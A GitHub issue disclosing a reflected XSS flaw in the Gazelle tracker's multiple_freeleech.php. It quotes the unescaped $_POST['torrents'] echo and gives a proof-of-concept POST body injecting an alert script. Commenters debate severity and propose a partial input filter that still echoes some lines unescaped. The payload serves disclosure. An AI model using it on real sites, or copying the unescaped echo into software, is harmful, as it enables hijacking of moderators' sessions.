Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

xss_3 #131

Open
xjzzzxx opened this issue Jul 15, 2024 · 3 comments
Open

xss_3 #131

xjzzzxx opened this issue Jul 15, 2024 · 3 comments

Comments

@xjzzzxx
Copy link

xjzzzxx commented Jul 15, 2024
edited
Loading

Hello,

I would like to report for a XSS vulnerability in gazelle commit 63b3370

In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/multiple_freeleech.php

...
<textarea name="torrents" style="width: 95%; height: 200px;"><?=$_POST['torrents']?></textarea><br /><br />			// Line 96
...

Source from $_POST['torrents'] without any filtering or checking which resulting in XSS.

Poc

POST /sections/tools/managers/multiple_freeleech.php

With the Data

torrents=</textarea>%3Cscript%3Ealert(1);%3C/script%3E<textarea>

Manual verification

3_0

3

BTW,cms.gazelle.com in local(changes hosts)
@aaronhenderson
Copy link

Same as my comment submitted two instances ago; as an old timer who began in gazelle, codeigniter and laravel I applaud your analysis and disclosure.

@dalilgriffith
Copy link

This one is of low importance. User would have to have users_mod permission to access this. I did circumvent this:

This is very simple. A proper regex implementation would further insure proper validation.

if (isset($_POST['torrents'])) {
    $GroupIDs = array();
    $Elements = explode("\r\n", $_POST['torrents']);
    foreach ($Elements as $EKey => $Element) {
        // Get all of the torrent IDs
        if (strpos($Element, "torrents.php") !== false) {
            $Data = explode("id=", $Element);
            if (!empty($Data[1])) {
                $GroupIDs[] = (int) $Data[1];
            }
        } else if (strpos($Element, "collages.php") !== false) {
            $Data = explode("id=", $Element);
            if (!empty($Data[1])) {
                $CollageID = (int) $Data[1];
                $DB->query("
                    SELECT GroupID
                    FROM collages_torrents
                    WHERE CollageID = '$CollageID'");
                while (list($GroupID) = $DB->next_record()) {
                    $GroupIDs[] = (int) $GroupID;
                }
            }
        } else {
			unset($Elements[$EKey]);
		}
    }

	$_POST['torrents'] = implode("\r\n",$Elements);

@arthur4ires
Copy link

@dalilgriffith

I agree with you if we evaluate the vulnerability based on CVSS (https://www.first.org/cvss), since PR would be equal to Low.

But note that XSS has an impact because the attacker, with a click from a moderator, could perform any action by the moderator.

So, if this attack is targeted, it has a relevant impact.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@aaronhenderson @dalilgriffith @arthur4ires @xjzzzxx